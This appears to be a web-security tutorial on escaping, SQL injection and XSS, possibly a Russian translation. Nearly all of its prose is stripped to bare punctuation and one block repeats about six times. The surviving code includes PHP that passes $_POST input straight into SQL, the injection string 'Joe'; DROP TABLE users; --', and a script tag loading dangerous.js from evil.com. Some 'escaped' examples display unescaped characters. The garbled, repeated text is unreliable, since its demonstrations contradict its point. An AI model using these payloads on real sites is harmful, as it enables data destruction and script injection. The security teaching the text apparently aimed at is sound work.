<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " & ", .. : " &< "
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name'] - , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string , - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars , , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML). ? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " & ", .. : " &< "
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name'] - , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string , - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars , , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " & ", .. : " &< "
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name'] - , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string , - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars , , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML). ? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " & ", .. : " &< "
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name'] - , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string , - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars , , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " & ", .. : " &< "
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name'] - , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string , - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars , , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML). ? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " & ", .. : " &< "
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name'] - , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string , - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars , , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " & ", .. : " &< "
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name'] - , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string , - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars , , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML). ? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
